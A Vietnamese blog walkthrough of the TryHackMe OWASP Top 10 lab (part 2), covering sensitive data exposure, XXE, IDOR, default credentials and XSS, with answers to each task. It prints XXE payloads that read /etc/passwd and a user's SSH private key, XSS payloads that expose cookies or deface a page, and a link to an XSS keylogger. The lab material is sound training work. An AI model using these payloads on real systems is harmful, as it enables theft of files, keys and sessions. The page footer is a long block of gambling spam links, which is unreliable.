• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

TryHackMe: Thử thách OWASP Top 10 [Phần 2]

Ellyx13 by Ellyx13
11/10/2021 - Updated on 24/07/2025
in Basic Hacking
A A
0

Mục lục bài viết

  1. TryHackMe: Thử thách OWASP Top 10 [Phần 2]
    1. Nhiệm vụ 11: [Mức độ nghiêm trọng 3] Rò rỉ dữ liệu nhạy cảm
      1. # 1 Dev có để lại một ghi chú chỉ ra rằng có dữ liệu nhạy cảm trong một thư mục nào đó.
      2. # 2 Truy cập đến thư mục bạn đã tìm thấy. Và tìm file có khả năng chứa dữ liệu nhạy cảm
      3. # 3 Khai thác file chứa dữ liệu nhạy cảm và tìm mã băm mật khẩu
      4. #4 Bẻ khóa mã băm
      5. #5 Đăng nhập với tư cách là admin và tìm flag
    2. Nhiệm vụ 13: [Mức độ nghiêm trọng 4] XML External Entity
      1. #1 XML là viết tắt của từ gì?
      2. #2 Có bắt buộc phải mở đầu XML trong các tài liệu XML không?
      3. #3 Chúng ta có thể xác thực các tài liệu XML dựa trên một lược đồ không?
      4. #4 Làm thế nào để chỉ định phiên bản XML và cách mã hóa trong tài liệu XML?
    3. Nhiệm vụ 14: [Mức độ nghiêm trọng 4] XML External Entity — DTD
      1. # 1 Làm thế nào để xác định một ROOT element?
      2. # 2 Xác định ROOT element như thế nào?
      3. # 3 Xác định ENTITY mới như thế nào?
    4. Nhiệm vụ 15 [Mức độ nghiêm trọng 4] XML External Entity — XXE Payload
    5. Nhiệm vụ 16: [Mức độ nghiêm trọng 4] Đối tượng bên ngoài XML – Exploiting
      1. #3 Tên của người dùng trong /etc/passwd là gì?
      2. #4 Khóa SSH của falcon nằm ở đâu?
      3. #5 18 ký tự đầu tiên trong private key của falcon là gì?
    6. Nhiệm vụ 18: [Mức độ nghiêm trọng 5] Broken Access Control (Thử thách IDOR)
      1. #1 Đọc và hiểu cách IDOR hoạt động.
      2. #2 Triển khai và truy cập http://10.10.220.97 – Đăng nhập với tên người dùng là noot và mật khẩu là test1234.
    7. Nhiệm vụ 19: [Mức độ nghiêm trọng 6] Cấu hình sai bảo mật
      1. Cấu hình sai bảo mật (Security Misconfiguration)
      2. Cấu hình sai bảo mật bao gồm:
    8. Nhiệm vụ 20: [Mức độ nghiêm trọng 7] Cross-site Scripting (XSS)
      1. Giải thích XSS
      2. XSS Payloads
      3. Các thử thách XSS
  2. Câu hỏi thường gặp
    1. Phần 2 của bài viết này đề cập đến những lỗ hổng bảo mật nào?
    2. Tôi có cần kiến thức lập trình sâu rộng để thực hiện các nhiệm vụ trong bài viết?
    3. Tôi có thể tìm hiểu thêm về OWASP Top 10 ở đâu?

Ở phần 2 này, chúng ta sẽ tiếp tục khai thác các lỗ hổng khác trong OWASP Top 10 trên Tryhackme. Nếu bạn chưa biết OWASP là gì thì có thể đọc tại đây.

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

TryHackMe: Thử thách OWASP Top 10 [Phần 2]

Các bài viết liên quan

Cách Active Key Sublime Text 4 - Tải Sublime Text 4 Full Key 66

Cách Active Key Sublime Text 4 – Tải Sublime Text 4 Full Key

23/05/2025 - Updated on 25/07/2025
10 công cụ Pentesting mà mọi hacker đều cần 67

10 công cụ Pentesting mà mọi hacker đều cần

31/05/2024 - Updated on 24/07/2025
10 công cụ OSINT mà hacker cần biết 68

10 công cụ OSINT mà hacker cần biết

29/05/2024 - Updated on 24/07/2025
hacker Lazarus Lazarus

Hacker Triều Tiên lợi dụng lỗ hổng Windows để tấn công bằng Rootkit

02/03/2024

TryHackMe: Thử thách OWASP Top 10 [Phần 2]

Nhiệm vụ 11: [Mức độ nghiêm trọng 3] Rò rỉ dữ liệu nhạy cảm

Đã đến lúc áp dụng những gì bạn đã học được vào thực tế rồi.

# 1 Dev có để lại một ghi chú chỉ ra rằng có dữ liệu nhạy cảm trong một thư mục nào đó.

Tên của thư mục đó là gì?

Truy cập vào trang web và bạn sẽ thấy mục đăng nhập.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 35

Vào trang đăng nhập.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 36

Kiểm tra mã nguồn của web.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 37

Các bạn có thấy cái mà mình đang thấy không :v.

Đáp án: /assets

# 2 Truy cập đến thư mục bạn đã tìm thấy. Và tìm file có khả năng chứa dữ liệu nhạy cảm

Truy cập vào thư mục assets.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 38

Thành công rồi đó.

Đáp án: webapp.db

# 3 Khai thác file chứa dữ liệu nhạy cảm và tìm mã băm mật khẩu

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 39

Chúng ta có thể thấy rằng có một cơ sở dữ liệu SQlite trong thư mục hiện tại.

Để truy cập nó, mình sử dụng lệnh sqlite3 <database-name>

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 40

Từ đây, chúng ta có thể xem các bảng trong cơ sở dữ liệu bằng cách sử dụng lệnh .tables:

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 41

Mình có thể kết xuất tất cả dữ liệu ra khỏi bảng, nhưng mình sẽ không biết ý nghĩa của mỗi cột trừ khi xem thông tin bảng. Trước tiên, hãy sử dụng lệnh PRAGMA table_info(customers); để xem thông tin bảng, sau đó sử dụng lệnh SELECT * FROM customers; để kết xuất thông tin khỏi bảng:

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 42

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 43

Giờ chúng ta đã tìm ra được mã băm rồi đó.

Đáp án: 6eea9b7ef19179a06954edd0f6c05ceb

Xem thêm:  Tổng hợp các thủ thuật Facebook chỉ trong 1 Tool

#4 Bẻ khóa mã băm

Để tìm ra mật khẩu dưới dạng văn bản thuần thì các bạn truy cập vào trang crackstation tại đây.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 44

Crackstation hoạt động bằng cách sử dụng một danh sách từ điển lớn. Nếu mật khẩu không có trong danh sách từ thì Crackstation sẽ không thể bẻ khóa mã băm.

Nếu Crackstation không bẻ khóa được mã băm này, thì hàm băm đó đã được thiết kế đặc biệt để không thể bẻ khóa được.

Đáp án: qwertyuiop

#5 Đăng nhập với tư cách là admin và tìm flag

Sử dụng tài khoản và mật khẩu đã tìm được để đăng nhập vào tài khoản admin.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 45

Đáp án: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Nhiệm vụ 13: [Mức độ nghiêm trọng 4] XML External Entity

#1 XML là viết tắt của từ gì?

Đáp án : Extensible Markup Language.

#2 Có bắt buộc phải mở đầu XML trong các tài liệu XML không?

Đáp án : Không

#3 Chúng ta có thể xác thực các tài liệu XML dựa trên một lược đồ không?

Đáp án : Có

#4 Làm thế nào để chỉ định phiên bản XML và cách mã hóa trong tài liệu XML?

Đáp án : XML Prolog

Nhiệm vụ 14: [Mức độ nghiêm trọng 4] XML External Entity — DTD

Trước khi bắt đầu tìm hiểu về XXE, chúng ta sẽ phải hiểu DTD trong XML là gì.

Đầu tiên tìm hiêu cách DTD xác thực XML. Đây là ý nghĩa của tất cả các thuật ngữ được sử dụng trong note.dtd

!DOCTYPE note – Xác định phần tử gốc của tài liệu có tên note

!ELEMENT note – Xác định phần tử note phải chứa các thành phần: “to, from, heading, body”

!ELEMENT to – Xác định phần tử thuộc loại “#PCDATA”

!ELEMENT from – Xác định phần tử có kiểu “#PCDATA”

!ELEMENT heading – Xác định phần tử tiêu đề thuộc loại “#PCDATA”

!ELEMENT body – Xác định phần tử nội dung thuộc loại “#PCDATA”

LƯU Ý: #PCDATA có nghĩa là parseable character data (dữ liệu ký tự có thể phân tích cú pháp).

# 1 Làm thế nào để xác định một ROOT element?

Đáp án: !ELEMENT

# 2 Xác định ROOT element như thế nào?

Đáp án: !DOCTYPE

# 3 Xác định ENTITY mới như thế nào?

Đáp án: !ENTITY

Nhiệm vụ 15 [Mức độ nghiêm trọng 4] XML External Entity — XXE Payload

1) Payload đầu tiên mà chúng ta sẽ thấy rất đơn giản. Nếu bạn đã đọc những nhiệm vụ trước đó thì bạn sẽ payload này.

<!DOCTYPE replace [<!ENTITY name “feast”> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>

Chúng ta đang xác định một ENTITY và gán cho nó giá trị feast. Tiếp, chúng ta sẽ sử dụng ENTITY đó trong code.

2) Chúng ta cũng có thể sử dụng XXE để đọc một số tệp từ hệ thống bằng cách xác định ENTITY và sử dụng từ khóa SYSTEM

<?xml version=”1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM ‘file:////cat /etc/passwd>]>
<root>&read;</root>

Chúng ta xác định ENTITY với giá trị là `SYSTEM` và đường dẫn của tệp.

Nếu mình sử dụng payload này thì một trang web dễ bị tấn công bởi XXE (thông thường) sẽ hiển thị nội dung của tệp /etc/passwd.

Theo cách tương tự, chúng ta có thể sử dụng loại payload này để đọc các tệp khác.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 46

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 47

Nhiệm vụ 16: [Mức độ nghiêm trọng 4] Đối tượng bên ngoài XML – Exploiting

#3 Tên của người dùng trong /etc/passwd là gì?

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 48

Đáp án: falcon

#4 Khóa SSH của falcon nằm ở đâu?

Tìm kiếm trên mạng xem khóa SSH được lưu ở đâu.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 49

Đáp án: /home/falcon/.ssh/id_rsa

#5 18 ký tự đầu tiên trong private key của falcon là gì?

<?xml version=”1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM ‘file:////home/falcon/.ssh/id_rsa>]>
<root>&read;</root>

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 50

Đáp án: MIIEogIBAAKCAQEA7b

Nhiệm vụ 18: [Mức độ nghiêm trọng 5] Broken Access Control (Thử thách IDOR)

IDOR, hoặc Insecure Direct Object Reference (tham chiếu đối tượng trực tiếp không an toàn), là hành động khai thác cấu hình sai trong cách xử lý đầu vào của người dùng, để truy cập vào các tài nguyên mà thông thường bạn không thể truy cập. IDOR là một loại lỗ hổng kiểm soát truy cập.

Ví dụ: giả sử chúng ta đang đăng nhập vào tài khoản ngân hàng của mình và sau khi tự xác thực chính xác, chúng ta sẽ được đưa đến một URL như sau https://example.com/bank?account_number=1234. Trên trang đó, mình có thể xem tất cả các chi tiết ngân hàng quan trọng của bả thân và người dùng sẽ làm bất cứ điều gì họ cần làm và suy nghĩ không có gì sai.

Xem thêm:  Hướng dẫn Hack Camera Điện thoại bằng cách gửi Link Website

Tuy nhiên, có một vấn đề lớn tiềm ẩn ở đây, một tin tặc có thể thay đổi thông số account_number thành một số khác như 1235 và nếu trang web được định cấu hình không chính xác, thì hacker sẽ có quyền truy cập vào thông tin ngân hàng của người khác (như vụ metap).

#1 Đọc và hiểu cách IDOR hoạt động.

#2 Triển khai và truy cập http://10.10.220.97 – Đăng nhập với tên người dùng là noot và mật khẩu là test1234.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 51

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 52

Mình đã thử tăng dần số sau note = 1 theo thứ tự, nhưng nó không xảy ra. Nhưng khi thử số 0 thì lại có kết quả.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 53

Đáp án: flag{fivefourthree}

Nhiệm vụ 19: [Mức độ nghiêm trọng 6] Cấu hình sai bảo mật

Cấu hình sai bảo mật (Security Misconfiguration)

Cấu hình sai bảo mật khác với 10 lỗ hổng OWASP hàng đầu khác, bởi vì lỗi này chỉ xảy ra khi bạn cấu hình sai bảo mật hệ thống.

Cấu hình sai bảo mật bao gồm:

Các quyền được cấu hình kém trên các dịch vụ đám mây, chẳng hạn như nhóm S3 bật các tính năng không cần thiết, như dịch vụ, trang, tài khoản hoặc đặc quyền của tài khoản mặc định với mật khẩu không thay đổi, thông báo lỗi quá chi tiết và cho phép kẻ tấn công tìm hiểu thêm về hệ thống, không sử dụng HTTP security headers hoặc tiết lộ quá nhiều chi tiết trong Server: HTTP header.

Lỗ hổng này thường có thể dẫn đến nhiều lỗ hổng khác hơn, chẳng hạn như thông tin xác thực mặc định cho phép bạn truy cập vào dữ liệu nhạy cảm, XXE hoặc chèn lệnh trên các trang quản trị.

Máy ảo trong nhiệm vụ này tập trung vào mật khẩu mặc định. Đây là một ví dụ cụ thể về cấu hình sai bảo mật. Bạn nên thay đổi bất kỳ mật khẩu mặc định nào trong hệ thống.

Mật khẩu mặc định rất phổ biến trong các thiết bị nhúng và Internet of Things, và phần lớn các chủ sở hữu thiết bị không thay đổi các mật khẩu này.

Mức độ rủi ro về thông tin xác thực mặc định còn tùy theo quan điểm của kẻ tấn công. Chúng có thể truy cập vào trang quản trị, các dịch vụ được thiết kế cho quản trị viên hệ thống hoặc nhà sản xuất, hoặc thậm chí cơ sở hạ tầng mạng cũng có thể vô cùng hữu ích trong việc tấn công doanh nghiệp. Từ việc tiếp xúc dữ liệu đến RCE dễ dàng, ảnh hưởng của thông tin xác thực mặc định có thể rất nghiêm trọng.

Vào tháng 10 năm 2016, Dyn (một nhà cung cấp DNS) đã bị DDoS bởi một trong những cuộc tấn công DDoS đáng nhớ nhất trong 10 năm qua. Lưu lượng truy cập chủ yếu đến từ Internet of Things và các thiết bị mạng như bộ định tuyến và modem, bị nhiễm phần mềm độc hại Mirai.

Phần mềm độc hại đã xâm nhập vào hệ thống như thế nào? Bằng mật khẩu mặc định. Phần mềm độc hại có danh sách chứa 63 cặp username/password và tin tặc sẽ cố gắng đăng nhập vào các dịch vụ telnet bị lộ.

Các cuộc tấn công DDoS rất đáng chú ý vì nó đã khiến nhiều trang web và dịch vụ lớn bị gián đoạn. Amazon, Twitter, Netflix, GitHub, Xbox Live, PlayStation Network và nhiều dịch vụ khác đã offline trong vài giờ trong 3 đợt tấn công DDoS vào Dyn.

Ví dụ thực tế: Máy ảo này bị cấu hình sai bảo mật, như một lỗi của danh sách 10 lỗ hổng hàng đầu của OWASP.

Triển khai VM và xâm nhập bằng cách khai thác cấu hình sai bảo mật (Security Misconfiguration)!

#1 Triển khai VM (Máy ảo)

# 2 Xâm nhập vào ứng dụng web và tìm flag

Chúng ta có thể nghiên cứu username và mật khẩu mặc định là gì của pensive notes.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 54

Xem mình tìm thấy gì nào.

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 55

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 56

Đáp án:

thm{4b9513968fd564a87b28aa1f9d672e17}

Nhiệm vụ 20: [Mức độ nghiêm trọng 7] Cross-site Scripting (XSS)

Giải thích XSS

Cross-site scripting, còn được gọi là XSS là một lỗ hổng bảo mật thường thấy trong các ứng dụng web. Đây là một kiểu tiêm code có thể cho phép kẻ tấn công thực thi các tập lệnh độc hại và khiến nó thực thi trên máy của nạn nhân.

Một ứng dụng web dễ bị tấn công bởi XSS nếu nó sử dụng đầu vào của người dùng mà chưa được lọc. XSS có thể sử dụng trong Javascript, VBScript, Flash và CSS. Có ba loại XSS web chính:

Xem thêm:  Share Trọn Bộ 7 Tool DDOS Cực Mạnh Và Chất

Stored XSS: Là loại XSS nguy hiểm nhất. Đây là nơi bắt nguồn một chuỗi mã độc từ cơ sở dữ liệu của trang web. Điều này thường xảy ra khi một trang web lấy đầu vào từ người dùng mà chưa được lọc (loại bỏ “các ký tự đặc biệt” của người dùng nhập) khi được chèn vào cơ sở dữ liệu.

Reflected XSS: Payload độc hại là một phần request của victims đối với trang web. Trang web bao gồm payload này để phản hồi lại người dùng. Tóm lại, kẻ tấn công cần lừa nạn nhân nhấp vào URL để thực thi payload độc hại.

DOM-Based XSS: DOM là viết tắt của Document Object Model và là một giao diện lập trình cho các tài liệu HTML và XML. Nó giúp các chương trình có thể thay đổi cấu trúc, kiểu và nội dung tài liệu. Trang web là một tài liệu và tài liệu này có thể được hiển thị trong cửa sổ trình duyệt hoặc dưới dạng mã nguồn HTML.

Để biết thêm các giải thích và bài tập XSS, hãy đọc bài viết này.

XSS Payloads

Hãy nhớ rằng, XSS là một lỗ hổng có thể bị lợi dụng để thực thi Javascript độc hại trên máy của nạn nhân. Một số loại payload phổ biến được sử dụng:

  • Cửa sổ Popup (<script>alert(“Hello World”)</script>) – Tạo cửa sổ bật lên thông báo Hello World trên trình duyệt của người dùng.
  • Viết HTML (document.write) – Ghi đè HTML của trang web để thêm code của riêng bạn.
  • XSS Keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) – Bạn có thể ghi lại tất cả các lần gõ phím của người dùng, ghi lại mật khẩu của họ và các thông tin nhạy cảm khác mà họ nhập vào trang web.
  • Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) – Một máy quét cổng local mini.

XSS-Payloads.com (http://www.xss-payloads.com/) là một trang web có payload, công cụ, tài liệu liên quan đến XSS nhiều thứ khác nữa. Bạn có thể tải các payload XSS chụp ảnh nhanh từ webcam hoặc thậm chí port scanner.

Các thử thách XSS

Máy ảo đi kèm với nhiệm vụ này dựa trên DOM, có Reflected và Stored XSS. Giờ hãy triển khai máy ảo và bắt đầu khai thác lỗ hổng XSS nào.

#1 Triển khai VM (Máy ảo)

#2 Truy cập http://10.10.193.134/reflected và tạo một payload reflected XSS để tạo cửa sổ popup “Hello“.

Viết Script:

<script>alert(“hello”)</script>

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 57

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 58

Đáp án: ThereIsMoreToXSSThanYouThink

#3 Trên cùng một trang reflective, tạo một payload XSS bật cửa sổ popup chứa địa chỉ IP của bạn.

<script>alert(window.location.hostname)</script>

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 59

TryHackMe: Thử thách OWASP Top 10 [Phần 2] 60

Đáp án: ReflectiveXss4TheWin

#4 Truy cập đến http://10.10.193.134/stored và tạo tài khoản.

Sau đó, thêm bình luận và xem liệu bạn có thể chèn code HTML hay không.
<html><body><p>I am a emre</p></body></html>
TryHackMe: Thử thách OWASP Top 10 [Phần 2] 61
TryHackMe: Thử thách OWASP Top 10 [Phần 2] 62
Thành công rồi đó.
Đáp án: HTML_T4gs
#5 Trên cùng một trang, hãy tạo một cửa sổ popup chứa cookie của bạn.
<script>alert(document.cookie)</script>
TryHackMe: Thử thách OWASP Top 10 [Phần 2] 63
TryHackMe: Thử thách OWASP Top 10 [Phần 2] 64
Đáp án: W3LL_D0N3_LVL2
#6 Thay đổi “XSS Playground” thành “I am a hacker” bằng cách thêm bình luận và sử dụng Javascript.
<script>document.querySelector(‘#thm-title’).textContent = ‘I am a hacker’</script>
TryHackMe: Thử thách OWASP Top 10 [Phần 2] 65
Đáp án: websites_can_be_easily_defaced_with_xss
Trong bài viết này chúng ta đã hoàn thành khai thác các lỗi như Sensitive Data Exposure (Rò rỉ dữ liệu nhạy cảm), XML External Entity, Broken Access Control, Security Misconfiguration (Cấu hình sai hệ thống) and Cross-site Scripting (XSS).
Ở bài viết tiếp theo, chúng ta sẽ tìm hiểu cách khai thác các lỗ hổng như Insecure Deserialization, Components With known Vulnerabilities, và Insufficient Logging & Monitoring.

Câu hỏi thường gặp

Phần 2 của bài viết này đề cập đến những lỗ hổng bảo mật nào?

Phần 2 tập trung vào việc khai thác các lỗ hổng trong OWASP Top 10 trên nền tảng TryHackMe, bao gồm rò rỉ dữ liệu nhạy cảm và XML External Entity (XXE).

Tôi có cần kiến thức lập trình sâu rộng để thực hiện các nhiệm vụ trong bài viết?

Không cần thiết. Bài viết hướng dẫn từng bước cụ thể, phù hợp với cả người mới bắt đầu. Tuy nhiên, kiến thức cơ bản về bảo mật web và dòng lệnh sẽ giúp bạn hiểu bài tốt hơn.

Tôi có thể tìm hiểu thêm về OWASP Top 10 ở đâu?

Bài viết cung cấp đường dẫn đến bài viết tổng quan về OWASP Top 10. Bạn cũng có thể tìm kiếm thông tin trên trang web chính thức của OWASP.

Tags: hackhackerOWASPtryhackme
Ellyx13

Ellyx13

DevOps với hơn 7 năm kinh nghiệm trong lĩnh vực hạ tầng, tự động hóa CI/CD và triển khai hệ thống phân tán trên các nền tảng như AWS, Azure và Kubernetes. - AWS Certified DevOps Engineer – Professional - Certified Kubernetes Administrator (CKA) - HashiCorp Certified: Terraform Associate - Docker Certified Associate (DCA) Có người không dám bước vì sợ gãy chân, nhưng sợ gãy chân mà không dám bước đi thì khác nào chân đã gãy.

Related Posts

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit 69
Basic Hacking

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

08/03/2025 - Updated on 25/07/2025
Cách khai thác lỗ hổng DLL Hijacking trên Windows 70
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025 - Updated on 25/07/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 71
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 72
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024 - Updated on 24/07/2025
Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 73
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024 - Updated on 24/07/2025
Seekr: Thu thập & quản lý dữ liệu OSINT 74
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

iPhone Air pin bao nhiêu? So sánh, đánh giá thời lượng sử dụng pin 1

iPhone Air pin bao nhiêu? So sánh, đánh giá thời lượng sử dụng pin

by Lan Ngọc
16/10/2025
0

[Tuyển tập] 10+ Font chữ Halloween kinh dị nhất cho banner, poster 2

[Tuyển tập] 10+ Font chữ Halloween kinh dị nhất cho banner, poster

by Lan Ngọc
16/10/2025
0

Các mẹo và thủ thuật cải thiện năng suất trên Google Drive 3

Các mẹo và thủ thuật cải thiện năng suất trên Google Drive

by Ellyx13
16/10/2025
0

Cách xóa watermark video Sora miễn phí, không cần cài đặt 4

Cách xóa watermark video Sora miễn phí, không cần cài đặt

by Thanh Kim
16/10/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • thịnh trong Hướng dẫn nhận key IObit Uninstaller 14 miễn phí 6 tháng
  • veoe trong Bí quyết tạo ảnh cầm bó hoa đẹp như bìa tạp chí với Nano Banana
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • mon trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Felizz23 trong Namecheap khuyến mãi 3 Domain giá 0$
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • ann trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Kim trong Namecheap khuyến mãi 3 Domain giá 0$
  • em hậu trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • Võ Sĩ Cua trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Tuấn Tú trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Quốc Vũ trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Ski trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • linh trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Heheehe🐧 trong Top 10 Phần mềm miễn phí cho Windows 11 nên cài
  • Jdi trong Download Hack of Products v5 APK – Hack vật phẩm trên Android
  • Hoàng Na trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • nam trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • HOA trong Cách chuyển Văn bản thành Giọng nói không giới hạn thời gian
  • HOA trong Cách chuyển Văn bản thành Giọng nói không giới hạn thời gian

©2025 AnonyViet - Chúng tôi mang đến cho bạ những kiến thức bổ ích về CNTT Công nghệ kết quả xổ số hôm nay trực tiếp bóng đá xoilac colatv truc tiep bong da xoilac 8x bet https://new88.market/ https://cwfun.org/ 33win Ae888 kubet 188BET 188BET Link kubet 8kbet 99ok xin88 good88 https://max886.org/ xn88 kubet RR88 cakhiatv f8bet https://qq883a.com/ XX88 Leo88 mu88 casino https://u888.one/ https://sunwin10.org/ f168 fm88 xin88 https://918xxy.com/ kubet thailand vip66 xoso66 vip66 xoso66 https://tp88fun.com/ daga f8bet hello88 qq88 GK88 PG88 SV388 PG88 Xoso66 Vip66 hitclub bong99 Ga6789 XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 Thabet press ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ sunwin https://ok9393.com/ nhà cái bj88 sv368pro https://xx88.space/ xoilac cakhiatv socolive QQ88 TP88 Xoso66 xoso66 u888 79king pg88 f168 88vv https://mm88.today/ mu88 com 8kbet https://qq88pro.vip/ xoso66 98win fun88.supply king88 33win sv388 v9bet s666 https://max88rl.com/ https://ok365rl.com/ RR88 kubet EE88 FB88 77BET TYPHU88 https://xx88.ink/ https://vb88.social/ https://da88.design/ 789f Kkwin go88 bj8888 79king 58win xin88 XX88 VSBET 23WIN https://mb66co.com/ https://fun88.supply/ pg88 colatv truc tiep bong da thapcamtv thapcamtv https://rr88.navy/ https://e2beting.com/ gem88 bk8 bk8 F8BET80 typhu88 k8cc sa88 https://q23win.com/ 32win 32win 78win 68win BET88 68win luongsontv luongsontv https://vankhanhtv.cc/ 9bet https://nohutm.com SODO fun88 sunwin BL555 u888 https://nohumo.com 8xbet W88 link cola tv colatv trực tiếp bóng dá colatv trực tiếp bóng dá colatv colatv truc tiep bong da colatv colatv bóng dá trực tiếp https://kuwin.eu.com/ 58win https://s68win.com/ 58WIN NOHU90 https://hm8805.com/ GK88 https://go991.club/ 188bet ax88 8KBET 69VN 33WIN 32win Kuwin https://bbet88b.com/ https://gamesnohu.com/ Jun88.estate gavangtv gavangtv OK9 68WIN SHBET nohu90 https://xx88.center/ trực tiếp bóng rổ vswin uu88 HM88 NỔ HỦ ĐỔI THƯỞNG 789PCOM NHÀ CÁI MMOO bắn cá TT88COM GO 99 F168 https://k8cc.wiki/ https://betvisa.wales/ https://12betp1.com/ https://loto188.im/ https://celinediontv.com/ https://sun-n-fun.com/ RR88 RR88 https://qq88.studio/ ee88 https://kjc88.com.de/ tài xỉu online uy tín Game bài đổi thưởng uy tín kèo nhà cái kèo nhà cái 5 789f 188bet w88 Gem88 Thabet jun88 kclub vip79 dv88 Gi8 For88 Rikbet 8kbet 6ff AX88 Kkwin HZ88 tv88 ABC8 https://ww88.me/ https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ sodo casino https://xx88.ac/ C54 xx88.me.uk gem88 king88 ae888 bj88 good88 32WIN https://xx88.today/ hm88 XX88 GO8 NH88 https://ok99.co.com/ XN88 58WIN NH88 32WIN ST666 28BET xn88 https://pg666.baby/ 789f 789f 88xx 98win mv88 https://469vns.com/ 888NEW TV88 XN88 NN88 MV88 MV66 GO8 